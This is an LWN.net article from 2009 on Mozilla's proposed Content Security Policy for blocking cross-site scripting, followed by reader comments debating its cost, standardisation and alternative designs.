Mozilla's Content Security Policy
Cross-site scripting (XSS) is a common web application flaw that can lead to a wide variety of attacks. The problem, and ways to eliminate it, have been known for years, but new instances of XSS crop up regularly in web applications—live sites as well as packages like content management systems. Mozilla has taken the lead on a new security policy, Content Security Policy (CSP), which provides a way for sites to avoid XSS. It does that by fundamentally changing the way JavaScript content is treated by the browser, but does so in a way that allows sites to opt-in to the new policy.
XSS works by injecting JavaScript content into the data returned by a web server. Normally that happens because some kind of user input was not properly filtered before it was echoed back on a web page. If that user input—in the form of a comment on an article, for example—contains unfiltered JavaScript, the users browser will happily execute it as if it originated with the site. At that point, an attacker-controlled code is running with the privileges of the browser user and the origin site.
As described by Mozilla's security program manager Brandon Sterne, on the Mozilla Security Blog, CSP changes that model. Instead of treating all content received in a response as having the same privilege level, CSP allows the site owner to explicitly list what kinds of JavaScript to trust. In order to do that, however, CSP strictly limits where JavaScript can originate, and where it can appear in HTML.
Basically, CSP allows a site operator to list hosts from which JavaScript content will be accepted. If that option is used (via an HTTP X-Content-Security-Policy header or HTML <META> tag), all JavaScript must be loaded from external files from hosts on the list—all other mechanisms for executing JavaScript are disabled for that page. Sterne describes it this way:
This will be an enormous change for sites that want to use CSP, but it is backward-compatible with older browsers (or those that do not support CSP), and there are ways to incrementally approach the implementation. Sterne notes that all sites should be able to make the switch, and Mozilla intends to provide a migration guide to help sites convert to CSP. But, it remains to be seen whether sites will actually use it. Mozilla security lead, Daniel Veditz, commented about that in the bug entry that tracks CSP implementation:
Note that we are not eliminating event handlers, just the ability to specify them inline. AddEventListener() will still work, as will setting the .click property of a DOM node. This is a little cumbersome, but there are already sites that do this for some of their content.
CSP is a gamble, it could be that the hurdle will turn out to be too high. But if we can get authors over that hurdle we can promise them a safer site.
Another interesting feature of CSP is its ability to notify a site when there is an attempt to violate the policy. This will even benefit users of browsers that don't support CSP, as XSS holes can be recognized and fixed more quickly. Sterne is optimistic about the effect of CSP:
The open question is whether site operators are concerned enough about XSS to change the way they handle JavaScript. Over time, automated tools may help with that process, which could lower the bar somewhat, but it is still a daunting task. One would guess that the other browsers will take a "wait and see" attitude before deciding whether to implement it. Though the implementation is progressing, there is no word from Mozilla on when it might release a browser with CSP either.
Perhaps CSP is too heavy-handed of a solution to the XSS problem, but it is good to see Mozilla taking a lead in trying to find something that will alleviate the problem. There are other, similar efforts in the works at Mozilla including the Origin header to mitigate cross-site request forgery and clickjacking.
While these web application vulnerabilities are largely understood and techniques to avoid them are known, they keep cropping up. Finding ways to make users' browsers more resistant to these kinds of attacks can only help improve web security.
Index entries for this article | |
---|---|
Security | Cross-site scripting (XSS) |
Security | Web browsers |
Posted Jul 2, 2009 9:45 UTC (Thu)
by tzafrir (subscriber, #11501)
[Link] (1 responses)
Posted Jul 2, 2009 13:02 UTC (Thu)
by mrshiny (subscriber, #4266)
[Link]
This policy has the potential to be extremely powerful but the difficulty in implementation is relatively high, especially for many of the popular sites. However, for any sites which don't have ads it could be easily done. I know that the site I maintain would need some framework upgrades to support this feature, however, when coding with this approach in mind it is easy enough to apply. And it's fully backwards compatible, which is great.
Posted Jul 2, 2009 10:06 UTC (Thu)
by alex (subscriber, #1355)
[Link] (3 responses)
Posted Jul 2, 2009 16:13 UTC (Thu)
by JoeBuck (subscriber, #2330)
[Link] (2 responses)
If a browser maker announces an experimental feature and does not assert patent rights that block others from using it, and it works out well, the standards committees can then add it to future standards.
Posted Jul 2, 2009 16:29 UTC (Thu)
by alex (subscriber, #1355)
[Link] (1 responses)
It would be interesting to know what Opera/Microsoft/WebKit developers think would help solve the problem.
Posted Jul 6, 2009 14:08 UTC (Mon)
by sbergman27 (guest, #10767)
[Link]
As well you should. I don't recall anyone at Netscape or MS asserting patent rights that blocked others from using their proprietary stuff. They were both just doing their own thing and playing the NIH game... as seems to be happening here. This does look very much like the bad old days of proprietary HTML tags. The standards should come first.
Posted Jul 2, 2009 14:27 UTC (Thu)
by butlerm (subscriber, #13312)
[Link] (4 responses)
Enabling this policy also makes it effectively impossible to use
For applications produced in an environment where developers are unaware or
That would effectively eliminate any real possibility of the web browser
Posted Jul 2, 2009 17:17 UTC (Thu)
by joey (guest, #328)
[Link] (2 responses)
I wish this CSP could be turned on at a block level. Something like:
Posted Jul 2, 2009 17:19 UTC (Thu)
by joey (guest, #328)
[Link]
Posted Jul 11, 2009 19:09 UTC (Sat)
by tulcod (guest, #59536)
[Link]
What Mozilla proposed is not a solution either, though: there is no reason users cannot upload scripts to a host. Heck, websites on most free webhosts would still be vulnerable. I think a better solution would be to only allow javascript to exist in the <head> tag, although this wouldn't be a solution for websites which, for whatever weird reason, would allow users to put stuff in the <head> of a webpage. XSS is an inherent problem with launching scripts from editable content. It would be better to disallow <script> tags completely and use a different mechanism to use javascript on a webpage alongside the HTML delivery, but that would mean properties like onclick and onmouseover would also have to be banned, which induces some rather serious limitations (read: webmasters won't like this).
For now, I'll stick with bbcode and some url encoding.
ps: wow, "webmasters". when was the last time I used that phrase?
Posted Jul 9, 2009 13:03 UTC (Thu)
by swiftone (guest, #17420)
[Link]
Any site that accepts user input has places that are vulnerable to being incorrectly coded. And as simple as correct coding is it doesn't take much effort to discover that a large number of sites are doing poorly at doing so, either because it turns out that cleansing input is non-trivial after all, or because it is easy to be lazy.
It takes only one developer to screw up in one place to leave a site vulnerable. Because of attacks like Cross Site Request Forgery (Generating a request to a different app that the user is authenticated to) a developer on one app can leave another otherwise secure app vulnerable.
This policy allows the server administrator to greatly reduce the threat in a single fell-swoop. I would not call that added-value "zero".
Meanwhile the cost is:
It is true that this makes dynamically generated javascript difficult. Who (outside of attackers) uses dynamically generated javascript? With the large array of stable and useful JS lubraries available, there should be no need for such butchery. (JSON parsers/generators are specifically mentioned as not being a problem in the CSP FAQ). Is there some bastion of useful dynamically generated JS that I am unaware of?
Posted Jul 2, 2009 16:03 UTC (Thu)
by alankila (guest, #47141)
[Link] (2 responses)
Posted Jul 2, 2009 16:16 UTC (Thu)
by JoeBuck (subscriber, #2330)
[Link] (1 responses)
Posted Jul 4, 2009 9:08 UTC (Sat)
by NAR (subscriber, #1313)
[Link]
Posted Jul 2, 2009 16:48 UTC (Thu)
by ccyoung (guest, #16340)
[Link] (3 responses)
this would allow on-page javascript to stay - in my case a good idea since a lot of the javascript itself is dynamic.
Posted Jul 2, 2009 23:20 UTC (Thu)
by riddochc (guest, #43)
[Link] (2 responses)
Your checksum won't tell you whether there's references to javascript in the content that's been sent to your browser. If the server didn't filter them properly, and your browser just does as its told (without giving you control over whether it should treat any individual portion as code or data) then your SHA sum will tell you that yes, indeed, the malicious code was malicious before it went into the comment system in the first place.
Posted Jul 2, 2009 23:44 UTC (Thu)
by ccyoung (guest, #16340)
[Link] (1 responses)
no javascript execute before hash completed (perhaps hash for head and one for body might speed things up).
is this impossible to do?
Posted Jul 3, 2009 1:00 UTC (Fri)
by riddochc (guest, #43)
[Link]
Suppose you're in charge of a city with a high rate of criminals breaking into people's houses. Your solution basically amounts to renaming the house numbers on every street, in the hopes that that will prevent criminals from finding houses to break into -- nevermind that they're already on the street in front of the physical buildings.
By the time the nefarious content has reached the browser, if the browser just goes on its merry way interpreting any javascript it's been sent, it doesn't matter much what else the server says to the client. If someone managed to insert javascript code into their comment, and submit it to the server so it'll show up in another user's browser, the TV's already on the sidewalk.
What the Mozilla proposal basically amounts to is making the browser not just interpret any random javascript it's been sent, but letting the website authors say, "Javascript that comes from here (the site's trusted javascript), go ahead an run - but ignore any other javascript, or triggers for it, you see on the web page."
Mozilla's Content Security Policy
Mozilla's Content Security Policy
Standards?
When a standard invents new functionality, it's usually a mistake. It's better to gain experience with a prototype implementation, and if it works well, standardize that.
Standards?
Standards?
Standards?
...when I saw a browser was "innovating" I had flash backs of the bad old days of proprietary HTML tags.
"""
Mozilla's Content Security Policy
being incorrectly coded to output large user submitted text fields without
encoding or user submitted html content without sanitization checks, the
added value of this system is approximately zero.
dynamically generated javascript without generating a bunch of little
temporary files, and forcing the web browser to submit secondary requests
to fetch them. That has major performance implications due to turn around
latency. It also seriously complicates the application development
process.
unable to follow basic security practices, or where even a temporary
unpatched "XSS" vulnerability is a serious matter, it would be far better
to propose an extension where script tags needed to carry an attribute with
a generated value that matched a value supplied in the HTTP response
headers.
executing a hostile user submitted script, do to the impossibility of
predicting a match, and the change in the generated value on every request.
I think you're probably right, which is a real pity, since sanitizing user-supplied html to remove all possible means of javascript injection is very tricky.
Mozilla's Content Security Policy
<csp="no-javascript">
user supplied html here
</csp>
BTW, right after I posted that, I found a javascript stripping bug in lwn.net, which I've emailed to Jon. :-/
Mozilla's Content Security Policy
Mozilla's Content Security Policy
Mozilla's Content Security Policy
Unless your application has a large number of places that are vulnerable to
being incorrectly coded to output large user submitted text fields without
encoding or user submitted html content without sanitization checks, the
added value of this system is approximately zero.
These costs seem far from prohibitive for the benefit in my opinion.
Mozilla's Content Security Policy
A bank or an online commerce site might still think that the tradeoff is worth it. In a situation where an XSS attack costs either the bank or the customer real money, it could be worth the tradeoff.
Mozilla's Content Security Policy
Mozilla's Content Security Policy
why not sha checksum?
Think about this some. What are you taking the SHA sum of? The content of the page, of course. Say, for example, that the page in question is contains a number of user-entered comments, like this one on LWN you're reading. Those comments were probably stored in a database - a script pulls them out, and inserts them into the appropriate places of the page.
why not sha checksum?
not following
No, taking a hash of any page is very easy to do. It simply doesn't do anything to solve this problem.
not following